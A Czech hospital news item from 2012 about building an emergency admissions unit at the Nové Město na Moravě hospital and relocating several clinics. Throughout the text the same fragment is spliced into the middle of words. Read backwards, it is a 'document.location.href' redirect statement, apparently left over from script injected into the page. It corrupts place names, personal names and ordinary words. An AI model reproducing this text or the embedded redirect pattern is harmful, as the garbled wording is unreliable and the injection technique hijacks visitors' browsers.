Nové Město na Moravě, nove mesto na morave, aktuality, Emergency, ambulance
Rainbow page separator

Začíná stavba Emergency, některé ambulance se přestěhují

Úterý, 24. dubna 2012

Nové Měs[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to na Moravě/Na začátku května začne v areálu novoměstské nemocnice další přestavba, jejímž cílem jsou kvalitnější a efektivnější služby posky[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tované našim pacientům. U vstupní části hlavního chirurgického pavilonu začnou stavbaři budovat akutní příjem známý častěji pod mezinárodně užívaným Emergency. Ten by měl v naší nemocnici začít fungovat během měsíce lis[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];topadu a zcela zásadně změní vstup pacientů do nemocnice. Urgentní příjem bude hlavní mís[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to v nemocnici, kam bude přicházet každý akutně nemocný pacient, bez ohledu na jeho potíže a zda přijede sám či sani[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tou (výjimku tvoří pacientky gynekologicko-porodnického oddělení a dětští pacienti s nechirurgickou diagnózou). Zde na něj bude čekat tým odborníků a po základním vyšetření a zahájení léčby rozhodne, na kterém oddělení bude hospitalizován. Může ale také třeba jít domů, nebo být převezen do některého specializovaného centra. „Kvalitní odborná péče by se měla dostat pacien[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovi velmi rychle po [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tom, co vs[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toupí do naší nemocnice,“ vysvětlil primář ARO a náměstek pro léčebnou péči MUDr. Dušan Mach.

Urgentní příjem bude umístěn v pavilonu chirurgických oborů nemocnice s bezbariérovým přístupem (bude v místech, kde je dnes přes mostek vstup k or[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];topedické,  urologické ambulanci a ambulanci bolesti).

Emergency  bude v souladu s mezinárodními zvyklostmi urgentních příjmů výrazně označen a bude mít přímou vazbu na radiodiagnostiku se čtyřiadvacetihodinovou možností CT diagnostiky, bude v dosahu operačních sálů a anesteziologicko-resuscitačního oddělení. V ambulantní části bude zajištěna stálá služba dvou lékařů, jednoho chirurga a jednoho internisty. K dispozici zde bude šest lůžek s přímou vazbou na ARO.

V souvislosti s budováním Emergency budou přestěhovány i některé ambulance. Přesuny se dotknou ambulancí or[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];topedické, urologické, psychologické, odborné chirurgické, nutriční, ORL ambulance a ambulance bolesti. Pro[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tože některé ambulance budou muset kvůli stavební úpravám změnit své umístění během budování Emergency dvakrát, doporučujeme pacientům sledovat webové stránky nemocnice, kde budou vždy včas a podrobně informováni, kde ambulance najdou.

Stavební úpravy vybudování Emergency budou stát asi deset milionů korun a budou hrazeny  z prostředků Kraje Vysočina.

Kde od 1. května nově najdete přesunuté ambulance:

  • Urologická ambulance – 1. podzemní podlaží chir. pavilonu (dříve ambulance ORL)
  • Or[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];topedická ambulance – 3. nadzemní podlaží chir. pavilonu (vedle oddělení or[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];topedie)
  • ORL ambulance – 1. nadzemní podlaží, dětské oddělení (dříve psycholog + duchovní služba)
  • Ambulance bolesti, nutriční ambulance – 1. nadzemní podlaží LSPP (výjezd z areálu nemocnice)
  • Psychologická ambulance – 2. nadzemní podlaží budovy dolní lékárny (dříve logopedie)
  • Logopedická ambulance – 2. nadzemní podlaží budovy dolní lékárny (pouze změna místnosti)

Připravil: Roman Kra[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tochvíl, Nemocnice Nové Měs[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to na Moravě, p.o.